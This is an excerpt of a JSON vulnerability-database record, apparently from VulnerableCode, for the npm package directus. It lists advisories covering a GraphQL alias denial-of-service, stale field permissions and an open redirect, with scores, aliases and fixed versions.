"scoring_elements": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:N" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-07T16:23:35Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-8m32-p958-jg99" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373752?format=api", "purl": "pkg:npm/directus@11.17.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0" } ], "aliases": [ "CVE-2026-35408", "GHSA-8m32-p958-jg99" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-v9s1-9n1m-bubs" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/359856?format=api", "vulnerability_id": "VCID-y6cy-k9c2-pkcb", "summary": "Directus: Unauthenticated Denial of Service via GraphQL Alias Amplification of Expensive Health Check Resolver\n## Summary\n\nThe GraphQL specification permits a single query to repeat the same field multiple times using aliases, with each alias resolved independently by default. Directus did not deduplicate resolver invocations within a single request, meaning each alias triggered a full, independent execution of the underlying resolver.\n\nThe health check resolver ran all backend checks (database connectivity, cache, storage writes, and SMTP verification) on every invocation. Combined with unauthenticated access to the system GraphQL endpoint, this allowed an attacker to amplify resource consumption significantly from a single HTTP request, exhausting the database connection pool, storage I/O, and SMTP connections.\n\n## Fix\n\nA request-scoped resolver deduplication mechanism was introduced and applied broadly across all GraphQL read resolvers, both system and items endpoints. When multiple aliases in a single request invoke the same resolver with identical arguments, only the first call executes; all subsequent aliases share its result. This eliminates the amplification factor regardless of how many aliases an attacker includes in a query.\n\n## Impact\n\n- **Service degradation or outage:** Database connection pool exhaustion prevents all Directus operations for all users\n- **Storage I/O saturation:** Concurrent file writes can overwhelm disk I/O\n- **SMTP resource exhaustion:** Concurrent SMTP verification calls may overwhelm the mail server\n- **No authentication required:** Any network-accessible attacker can trigger this condition\n- **Single-request impact:** A single request is sufficient to cause significant resource consumption\n\n## Credit\n\nThis vulnerability was discovered and reported by [bugbunny.ai](https://bugbunny.ai).", "references": [ { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-6q22-g298-grjh", "reference_id": "", "reference_type": "", "scores": [ { "value": "7.5", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "HIGH", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-6q22-g298-grjh" }, { "reference_url": "https://github.com/advisories/GHSA-6q22-g298-grjh", "reference_id": "GHSA-6q22-g298-grjh", "reference_type": "", "scores": [ { "value": "HIGH", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-6q22-g298-grjh" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373752?format=api", "purl": "pkg:npm/directus@11.17.0", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.17.0" } ], "aliases": [ "GHSA-6q22-g298-grjh" ], "risk_score": 4.0, "exploitability": "0.5", "weighted_severity": "8.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y6cy-k9c2-pkcb" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/90667?format=api", "vulnerability_id": "VCID-ywqb-qrvw-hfbh", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to version 11.13.0, Directus does not properly clean up field-level permissions when a field is deleted. When a field is removed from a collection, its reference in the permissions table remains intact. This stale reference creates a security gap: if another field is later created using the same name, it inherits the outdated permission entry. This behavior can unintentionally grant roles access to data they should not be able to read or modify. The issue is particularly risky in multi-tenant or production environments, where administrators may reuse field names, assuming old permissions have been fully cleared. Version 11.13.0 fixes the issue.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2025-64746", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13876", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13908", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13793", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00044", "scoring_system": "epss", "scoring_elements": "0.13906", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2025-64746" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://github.com/directus/directus/commit/84d7636969083387164ce5d2fd15a65e11e2d0b8", "reference_id": "84d7636969083387164ce5d2fd15a65e11e2d0b8", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:18:13Z/" } ], "url": "https://github.com/directus/directus/commit/84d7636969083387164ce5d2fd15a65e11e2d0b8" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64746", "reference_id": "CVE-2025-64746", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-64746" }, { "reference_url": "https://github.com/advisories/GHSA-9x5g-62gj-wqf2", "reference_id": "GHSA-9x5g-62gj-wqf2", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-9x5g-62gj-wqf2" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-9x5g-62gj-wqf2", "reference_id": "GHSA-9x5g-62gj-wqf2", "reference_type": "", "scores": [ { "value": "4.6", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-11-13T21:18:13Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-9x5g-62gj-wqf2" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/35193?format=api", "purl": "pkg:npm/directus@11.13.0", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-9dsr-kz3s-hkdx" }, { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-ah8z-vr21-wfd6" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-bg96-h5bt-xfbb" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-rdpb-7dcd-fyby" }, { "vulnerability": "VCID-u5hw-p46t-jybc" }, { "vulnerability": "VCID-ufth-uy5w-87fe" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" }, { "vulnerability": "VCID-z5ud-p9th-mff2" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.13.0" } ], "aliases": [ "CVE-2025-64746", "GHSA-9x5g-62gj-wqf2" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-ywqb-qrvw-hfbh" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/71813?format=api", "vulnerability_id": "VCID-z5ud-p9th-mff2", "summary": "Directus is a real-time API and App dashboard for managing SQL database content. Prior to 11.16.1, an open redirect vulnerability exists in the login redirection logic. The isLoginRedirectAllowed function fails to correctly identify certain malformed URLs as external, allowing attackers to bypass redirect allow-list validation and redirect users to arbitrary external domains upon successful authentication. This vulnerability is fixed in 11.16.1.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35410", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03617", "published_at": "2026-06-11T12:55:00Z" }, { "value": "0.00016", "scoring_system": "epss", "scoring_elements": "0.03634", "published_at": "2026-06-12T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04268", "published_at": "2026-06-14T12:55:00Z" }, { "value": "0.00017", "scoring_system": "epss", "scoring_elements": "0.04269", "published_at": "2026-06-13T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-35410" }, { "reference_url": "https://github.com/directus/directus", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/directus/directus" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35410", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-35410" }, { "reference_url": "https://github.com/advisories/GHSA-cf45-hxwj-4cfj", "reference_id": "GHSA-cf45-hxwj-4cfj", "reference_type": "", "scores": [ { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" } ], "url": "https://github.com/advisories/GHSA-cf45-hxwj-4cfj" }, { "reference_url": "https://github.com/directus/directus/security/advisories/GHSA-cf45-hxwj-4cfj", "reference_id": "GHSA-cf45-hxwj-4cfj", "reference_type": "", "scores": [ { "value": "6.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" }, { "value": "MODERATE", "scoring_system": "cvssv3.1_qr", "scoring_elements": "" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-07T14:47:25Z/" } ], "url": "https://github.com/directus/directus/security/advisories/GHSA-cf45-hxwj-4cfj" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/373399?format=api", "purl": "pkg:npm/directus@11.16.1", "is_vulnerable": true, "affected_by_vulnerabilities": [ { "vulnerability": "VCID-a1y7-cmk1-4ffn" }, { "vulnerability": "VCID-bc42-4j4d-tudj" }, { "vulnerability": "VCID-d8vm-nuff-uffc" }, { "vulnerability": "VCID-ga3s-595f-2keq" }, { "vulnerability": "VCID-v9s1-9n1m-bubs" }, { "vulnerability": "VCID-y6cy-k9c2-pkcb" } ], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@11.16.1" } ], "aliases": [ "CVE-2026-35410", "GHSA-cf45-hxwj-4cfj" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-z5ud-p9th-mff2" } ], "fixing_vulnerabilities": [], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:npm/directus@9.4.1" }